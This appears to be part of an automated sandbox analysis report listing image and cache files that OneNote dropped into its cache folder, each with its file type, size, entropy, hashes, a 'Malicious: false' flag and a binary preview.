SHA-256:	B7270592407C7362800EDAF9F215D760D951BE8AAABD75CD4B28AF678132B5D7
SHA-512:	D4C75EDFAC71FF4822585570449B94CB414717D341C95468FF3881551980BEDBC851C5CBF9F6244CB1591679F96E1A2BC494D323EA49A0ABEB62E5C00778DCF4
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZA^......A^.\|..,.1.M.&}@5A^.\|..,.1.M.&}@5A^...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............../o0......T.;......N...^...............a.:j.j#A.zb.b.:.........f........................................I.qk..B.....LZ............../o0......T.;............/o0......T.;...........A^......A^......A^..........................................A^.j....A^.T.]..A^......A^...B..A^.H....A^...B..A^...>.)A^...J...................;........4...4...4.."..............A^..A^..A^...z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........A^......A^.....#A^.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000067.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000068.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.472806210394127
Encrypted:	false
SSDEEP:	96:5uFfscF18kWXdhZkEg3MbmXdXk9PmQRyaD+NEh8koXegOj6MNsdO:5qsDldhzg3MbmXdXk9PmQRyOnK
MD5:	3A9FA02B99587C68FABADDD468D200CB
SHA1:	A469D63BD148AA768D52033FD5D2CE4586747277
SHA-256:	F4722E4283F87ED1D26B01C174985E9CCC207C8B44570F3E088CF7D438FE77EF
SHA-512:	676BB4FF5917A3E960A215E0B65CD00C12EFBAF34BA88EDE542AA505199550C1F2F362DF2017466AEA7E8BC8A0809422D949AECDBC6737501800B4057CF615E7
Malicious:	false
Preview:	2...>.......t...v...h...................................................................................................................................2...>...P.......v................................I.......I.qk..B.....LZ..............M...P\.w5.......M...P\.w5......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............n+.H../...W.6....N...^................ ..1.fO..M.#r..........f...................................$....I.qk..B.....LZ..............n+.H../...W.6..........n+.H../...W.6........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000069.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338346961244697
Encrypted:	false
SSDEEP:	48:ksBmxRMzatqpJEQLaXU9z0oNrdqr2koRXfrmQm59umRZOm/mQmCim5mW:ks8xGza+JEQuXU9z0cRykgL1RD+LC9g
MD5:	426AB0851DC4AFD83F187E1980DCB370
SHA1:	5E8BA69993F2B49AC810CC5C7CDF2839FEF5A046
SHA-256:	A9A546B033318C70B65C15E74CF0DE9F9C37C3AF248D3BF3E1DDE98C63FEC58D
SHA-512:	EC52253C7F220A066E97DA8172DB3E65F92700383D8B115B1A62E7635DCF0A17001F5B01A9195C62008E3D85FB35FE1F5BACB7EB7A23DC0EDD4890D1EB8A7B92
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZU.e.....U.ey.!_.,n.....5U.ey.!_.,n.....5U.e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............B.."....f"..>......N...^................$?.`..D.(..f.f.........f........................................I.qk..B.....LZ.............B.."....f"..>...........B.."....f"..>...........U.e.....U.e.....U.e.........................................U.ej....U.eT.]..U.e.....U.e..B..U.eH....U.e..B..U.e..>.)U.e..J...................;........4...4...4.."..............U.e.U.e.U.e..z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........U.e.....U.e....#U.e............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342730320759416
Encrypted:	false
SSDEEP:	96:6scyCfTp/EjFQtKXxEK97gERyKP2jy7I:6s8f1sxQtKXxEK97gERyKP2j
MD5:	C234E1790946CDEC08DC25329FD07D24
SHA1:	E9FB63911A7EE2131011AA92746CB81FBC5A4A7E
SHA-256:	2E86087A09C388FF6C48BE62FB9C7B2C4E4B4F061C914C2BCB45A876FC73B8F8
SHA-512:	3F3F39C7E6375C04836F1112379CDCE4636326305C4EC785A470709B8D24280C8753E160385506388435840F1075A3DD65A71F0F41EC2B08CBE89AC8D9C6A2D6
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ..r.......r$.%%."Fus.\|J9..r$.%%."Fus.\|J9..r..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. ..yE..=\!.,.......N...^...................`.MH...w............f........................................I.qk..B.....LZ............ ..yE..=\!.,........... ..yE..=\!.,..............r.......r.......r...........................................rj......rT.]....r.......r..B....rH......r..B....r..>.)..r..J...................;........4...4...4.."................r...r...r..z...y.. x.. ...........$........4.....7..7........................;........4...4...4...........r.......r....#..r............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3323383121672805
Encrypted:	false
SSDEEP:	48:2yJ2sI8jzEvSoqrth/EkY9BXn9rwodrdqrbiRXlxO6/pUCua:2yJ2s9MSoqrrEk6Xn9rw0RyOtB
MD5:	E9449EDCC7227C000F1528EAABFE222A
SHA1:	BA668BB6194124F143FBF662F3687C239829AA2B
SHA-256:	5C8291EDEF13C3E5AB7F6B9B10E46C5C6D4680E413FAF1999E4C2E0F029209E6
SHA-512:	E4FFE377C63CE53B12E4A5FE46F8EAB878104434F6605D5AB5892E531657F42F160CA0680561FB421CDEAB7C36F6291024C28C31E626953C3DDE67F1AD39D819
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ.........ii....E.F!%....ii....E.F!%......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............x(..:-F....fU.......N...^...............2..Vx.LB....[@.\........f........................................I.qk..B.....LZ............x(..:-F....fU...........x(..:-F....fU.......................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.469616614841069
Encrypted:	false
SSDEEP:	48:WsGbKu0sMtQH5mewLE5z5LOXsO58O9Ftioxrdqrf+KRXD/xyN33t:Ws3u0NmwLE5tLOXs5O9FtiQRyhw
MD5:	42214D56AFDE25D39D008386696F7637
SHA1:	2EFEE8A1231C24314B225379BD6061CB08E37CB9
SHA-256:	CCB6DAE04F0B108DD2D4011C16E95A1FE9CBCEEA8F8E147DE5F3454C0C88E92D
SHA-512:	5081352CC4811A77A32E29D8035F9B7E7E199A2EBDED8A68937EE864786F190B5B036FD1B0B3DF8D14A458AC121093B38642403CDF81B8972795FE42F34236DF
Malicious:	false
Preview:	2...>.......r...v...f...................................................................................................................................2...>...N.......v...............................`.......`...8... .M.M...I.......I.qk..B.....LZ`...8... .M.M..`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Y..0....B..Y.{.....N...^................k...pA.T.!.I..........f..................................."....I.qk..B.....LZ............Y..0....B..Y.{.........Y..0....B..Y.{..........`.......`.......`...........................................`..j....`..T.]..`.......`....B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........`.......`......#`..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.30801432437092
Encrypted:	false
SSDEEP:	96:HIsDiA3gBGBVNFBE3TOhXQ249jt16RyYFZA319prol:osgGBhejOhX749jt16Ryq
MD5:	612943DEB6CCB1A2DD8EF6E6202BD3D5
SHA1:	EFD1F68FF7A9A6E628F235B1F7851D0854BEC55F
SHA-256:	936162F87D341C9F9E5528D1127448557F0CE8A198113489397FF1C7DEF8413F
SHA-512:	A249EFEAE393F5A397F6DB71586514BFC657C5975492F8AED2AE371769B775B7AF3ABF90374BCB7F11D50EEDF7D1385ED92FB7F0E1CC5AE1CF2759F9C20DC7E7
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..N.......N.aND...e0...D..N.aND...e0...D..N..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............f..$.l....:R.f.....N...^................`...xI.X...?..........f........................................I.qk..B.....LZ............f..$.l....:R.f.........f..$.l....:R.f............N.......N.......N...........................................Nj......NT.]....N.......N..B....NH......N..B....N..>.)..N..J...................;........4...4...4.."................N...N...N..z...y.. x.. ...........$........4.....7..7........................;........4...4...4...........N.......N....#..N............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.337802558282347
Encrypted:	false
SSDEEP:	96:yszdxgfJ56zNEyFOXgWN9jS8RykiMQgYgXPzv1nkoQgKVI/:ysp6J5DkOXT9jS8RyrM3nJko3WI/
MD5:	514CE945F296E84E35CD02753DEEC812
SHA1:	6BBE090B0F7040127D3A70419E447FE1AD94A525
SHA-256:	DF3460731C6891457F39FFFE4CAC938BC4C0391C04EF326D376D2100D550EBFD
SHA-512:	19173CE2163FC7C5BD8027F9518B16DB8E179FDD2A0145242561E598B795A8280DBC0CDBFB2DE883AA75850069D3A32B5EE8A803029D27AFCC924518FDA0E3BD
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZh.......h....s../.TT?lX,h....s../.TT?lX,h....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............:..V...'....'P....N...^...............IT/..5.F..A...........f........................................I.qk..B.....LZ.............:..V...'....'P.........:..V...'....'P.........h.......h.......h...........................................h..j....h..T.]..h.......h....B..h..H....h....B..h....>.)h....J...................;........4...4...4.."..............h...h...h....z...y.. x.. ...........$........4.....7*..7........................;........4...4...4.........h.......h......#h..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.341269778962605
Encrypted:	false
SSDEEP:	96:07sFP9CeLEaBEfiFXfz9/xcRyQb49mH+kRHY:07sFP9CebefiFXfz9/xcRyK49mH+kR
MD5:	2879C8EC1FE54C09B6229A6726751BF3
SHA1:	1E574740B98D3A1CA2ECA66953FBBFCECBDF18EA
SHA-256:	DEA705D271074036B2AC0FC9C3A872DE0EEADD6BFA7DDE72079F9A97AA985921
SHA-512:	D40ACC0B90E09DD09A2B043B365454337B0E8DD266E3AAC3696C1BA9E1CDF6A8919032D0334DA716F7A55932D7956CB6DEAAE21ED0E22595D6A9F203925B71D8
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ...........24h..9..Q.t....24h..9..Q.t......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................Kc..8K.-uj.....N...^................W.y.^K....,O.........f........................................I.qk..B.....LZ................Kc..8K.-uj.............Kc..8K.-uj.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7*..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342103944429663
Encrypted:	false
SSDEEP:	96:TsWFKcxm5wEFXlx9D/tURyNlbI8bV8bKJ4:TsWFKcxmXFXz9rtURyNlbI8bV8bY4
MD5:	5826622D89A7100A37C14B700CDFEB59
SHA1:	2D5B5480809692D5B00D193387DFC67E5C9DB854
SHA-256:	248E4BA168DEFD6BA4A859981D5D31395642E28DE0A95552A50B372266C0CADB
SHA-512:	D8B5491A1B419C42C03B0BBA7090EC665D05393E3C5D3C2F8882938259F92B8223DD18871264847430403D3EC8A02F87761B38E1C3E653653AEB62D1C81C4601
Malicious:	false
